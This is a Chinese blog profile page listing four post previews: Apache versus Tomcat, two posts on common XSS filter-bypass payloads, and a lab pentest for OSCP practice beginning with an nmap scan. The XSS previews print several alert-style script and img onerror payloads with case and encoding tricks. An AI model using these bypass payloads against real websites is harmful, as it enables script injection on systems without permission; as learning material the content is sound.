- 博客(4)
- 收藏
- 关注
RSS订阅原创 apache和tomcat的区别和联系
经常在用apache和tomcat等这些服务器,可是总感觉还是不清楚他们之间有什么关系,在用tomcat的时候总出现apache,总感到迷惑,到底谁是主谁是次,因此特意在网上查询了一些这方面的资料,总结了一下:一apache支持静态页,tomcat支持动态的,比如servlet等,一般使用apache+tomcat的话,apache只是作为一个转发,对jsp的处理是由tomcat来...
2020-03-21 10:11:28
113
原创 常用xss绕过学习及poc,2
常见标签<scirpt>标签<scirpt>alert("xss");</script><img>标签<img src=javascript:alert("xss")><IMG SRC=javascript:alert(String.formCharCode(88,83,83))><img sc...
2020-01-06 16:03:12
924
1
原创 常用xss绕过学习及poc,1
一、标准语句<script>alert(/XSS/)</script>二、尝试大小写<sCript>alert(1)</scRipt>三、使用<img>标签1、windows事件<img src="x" onerror=alert(1)><img src="1" onerror=eva...
2020-01-06 15:55:33
1014
原创 一次简单靶机的渗透测试
最近一直在准备OSCP的考试,于是就下载了很多的靶机做渗透的练习,目的就是为了更进一步的学习渗透并拿到靶机中的flag。先挑一个简单一点的(路过的大佬们求放过),废话不多说直接上干货。1.获取靶机ip直接用nmap开路:root@kali:~# nmap -F 192.168.1.0/24,可以看到靶机的ip为192.168.1.52.服务枚举,扫一下tcp端口...
2019-10-07 23:01:40
1002
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人